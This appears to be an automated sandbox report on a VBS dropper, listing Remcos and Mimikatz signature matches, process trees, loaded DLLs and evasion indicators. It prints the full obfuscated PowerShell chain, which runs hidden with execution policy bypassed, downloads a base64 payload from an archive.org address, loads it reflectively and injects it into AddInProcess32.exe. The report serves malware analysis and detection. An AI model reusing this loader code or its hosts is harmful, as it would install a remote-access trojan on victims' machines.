                  Source: 00000006.00000002.1392660414.00000208F34A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000006.00000002.1392660414.00000208F44E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7360, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 7540, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: AddInProcess32.exe PID: 8028, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winVBS@8/6@4/3
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7368:120:WilError_03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-DCR6HW
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yd2ofkty.lqr.ps1
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\OIQ1ybtQdW.vbs"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSwyXS1qT2lOJycpKCAoJ3cxJysnWnVybCA9IFZ3M2h0dHAnKydzOi8vJysnaScrJ2E2JysnMDAxMDAudXMuYXJjaGl2ZS5vcmcnKycvMjQnKycvaScrJ3RlbXMvZGV0JysnYWgtJysnbm90ZS12LycrJ0RldGFoTm8nKyd0ZVYudHgnKyd0VnczOycrJ3cxWmJhc2U2JysnNEMnKydvbnRlJysnbnQgPSAoTmV3JysnLU9iaicrJ2VjdCAnKydTeScrJ3N0ZW0uTmV0JysnLlcnKydlYkNsaWVudCkuRG93bmxvYWRTJysndHJpbmcnKycodzFadXJsKTt3JysnMVpiJysnaW4nKydhcicrJ3lDb250ZW50ID0gWycrJ1N5Jysnc3RlbS5DJysnb24nKyd2JysnZXJ0JysnXTo6RicrJ3InKydvbUJhcycrJ2U2NFN0cmluZycrJyh3MVpiYXNlNicrJzRDb250ZScrJ250KTt3MVphc3NlbWJseSA9IFsnKydSZWZsZWN0JysnaScrJ29uLkFzJysnc2VtYmx5XScrJzo6TG9hZCcrJygnKyd3MVonKydiaW5hcnlDb24nKyd0ZW50JysnKTt3MVp0JysneXBlID0gdzFaYXNzJysnZW1iJysnbHkuR2V0VHlwJysnZShWdzMnKydSdScrJ25QRS4nKydIb21lJysnVnczKTt3JysnMVptZXRob2QgPSB3JysnMVonKyd0eScrJ3BlLkdldE1ldGhvZChWdzNWQUlWdzMpO3cxWm0nKydldGgnKydvZCcrJy5JbnZva2UodycrJzFabnVsbCwgJysnWycrJ29iamVjdFtdJysnXUAoVicrJ3czMC9wV2NKJysnbicrJy9kLycrJ2UnKydlLmV0c2FwLy86c3B0dGhWdzMgLCcrJyBWdzNkZXNhdGl2YScrJ2RvVnczICwgJysnVicrJ3czZGVzYXRpdmFkbycrJ1Z3JysnMyAsJysnIFZ3M2QnKydlcycrJ2EnKyd0aXZhZG9WJysndzMsVncnKyczQWRkSW5QJysncicrJ28nKydjZXNzMzJWdzMsJysnVicrJ3czVnczKSknKS5yZXBsQWNlKCdWdzMnLFtzVHJJTkddW0NIYVJdMzkpLnJlcGxBY2UoJ3cxWicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000006.00000002.1417039022.00000208FBA90000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000006.00000002.1392660414.00000208F444C000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'JiAoKFZBUklhQkxlICcqTURyKicpLm5hTWVbMywxMSw", "0", "false");
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ((VARIaBLe '*MDr*').naMe[3,11,2]-jOiN'')( ('w1'+'Zurl = Vw3http'+'s://'+'i'+'a6'+'00100.us.archive.org'+'/24'+'/i'+'tems/det'+'ah-'+'note-v/'+'DetahNo'+'teV.tx'+'tVw3;'+'w1Zbase6'+'4C'+'onte'+'nt = (New'+'-Obj'+'ect '+'Sy'+'stem.Net'+'.W'+'ebClient).DownloadS'+'tring'+'(w1Zurl);w'+'1Zb'+'in'+'ar'+'yContent = ['+'Sy'+'stem.C'+'on'+'v'+'ert'+']::F'+'r'+'omBas'+'e64String'+'(w1Zbase6'+'4Conte'+'nt);w1Zassembly = ['+'Reflect'+'i'+'on.As'+'sembly]'+'::Load'+'('+'w1Z'+'binaryCon'+'tent'+');w1Zt'+'ype = w1Zass'+'emb'+'ly.GetTyp'+'e(Vw3'+'Ru'+'nPE.'+'Home'+'Vw3);w'+'1Zmethod = w'+'1Z'+'ty'+'pe.GetMethod(Vw3VAIVw3);w1Zm'+'eth'+'od'+'.Invoke(w'+'1Znull, '+'['+'object[]'+']@(V'+'w30/pWcJ'+'n'+'/d/'+'e'+'e.etsap//:sptthVw3 ,'+' Vw3desativa'+'doVw3 , '+'V'+'w3desativado'+'Vw'+'3 ,'+' Vw3d'+'es'+'a'+'tivadoV'+'w3,Vw'+'3AddInP'+'r'+'o'+'cess32Vw3,'+'V'+'w3Vw3))').replAce('Vw3',[sTrING][CHaR]39).replAce('w1Z','$'))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFE7E4300BD pushad ; iretd 2_2_00007FFE7E4300C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFE7E4500BD pushad ; iretd 6_2_00007FFE7E4500C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 6_2_00007FFE7E525059 push ebp; iretd 6_2_00007FFE7E525060
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1907
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1451
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4334
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5316
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 4636
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: threadDelayed 4862
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Window / User API: foregroundWindowGot 1764
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 | Thread sleep count: 4334 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588 | Thread sleep count: 5316 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696 | Thread sleep time: -20291418481080494s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8056 | Thread sleep count: 245 > 30
